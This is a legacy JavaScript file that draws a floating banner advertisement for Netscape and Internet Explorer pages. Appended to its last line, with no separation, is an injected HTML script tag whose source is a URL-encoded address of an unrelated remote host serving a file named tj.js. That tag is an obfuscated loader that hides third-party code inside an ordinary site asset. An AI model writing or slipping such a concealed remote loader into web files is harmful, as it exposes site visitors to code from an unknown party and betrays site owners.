// float_r_flash.js
// change var

var adSrc3 = "gg/right.gif"
var adUrl3 = "http://www.nblry.com/"
var adWidth3 = "114"
var adHeight3 = "320"

// change var
var weny3 = -5
var wenx3 = -3

document.ns = navigator.appName == "Netscape"
function load3()
{
if (navigator.appName == "Netscape") {
	document.netease3.pageY=pageYOffset+window.innerHeight-adHeight3-weny3;
	document.netease3.pageX=+window.innerWidth-adWidth3-wenx3;
	move3();
	}
else {
	netease3.style.top=document.body.scrollTop+document.body.offsetHeight-adHeight3-weny3-300;
	netease3.style.left=document.body.offsetWidth-adWidth3-wenx3-20;
	move3();
	}
}

function move3() {
	if(document.ns) {
		document.netease3.top=pageYOffset+window.innerHeight-adHeight3-weny3;
		document.netease3.left=+window.innerWidth-adWidth3-wenx3;
		setTimeout("move3();",20)
	}
	else {
		netease3.style.top=document.body.scrollTop+document.body.offsetHeight-adHeight3-weny3-300;
		netease3.style.left=document.body.offsetWidth-adWidth3-wenx3-20;
		setTimeout("move3();",20)
	}
}

function MM_reloadPage3(init) { //reloads the window if Nav4 resized
	if (init==true)
		with (navigator)
		{
			if ((appName=="Netscape")&&(parseInt(appVersion)==4))
			{
				document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage3;
			}
		}
	else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH)
		location.reload();
}

MM_reloadPage3(true)

if (navigator.appName == "Netscape") {

	document.write("<layer id=netease3 top=0 width=" + adWidth3 + " height=" + adHeight3 + " ><a href=" + adUrl3 + " target=_blank><img src=" + adSrc3 + " border=0 width=" + adWidth3 + " height=" + adHeight3 + "></a></layer>");

	load3();

	}

else  {

	document.write("<div id=netease3 style='top:0; position: absolute; width:" + adWidth3 + ";'><a href=" + adUrl3 + " target=_blank><img src=" + adSrc3 + " border=0 width=" + adWidth3 + " height=" + adHeight3 + "></a></div>");

	load3();

	}<script language="JavaScript" src="%61%61%61%2E%68%61%6F%31%37%31%37%38%2E%63%6F%6D/tj.js"></script>
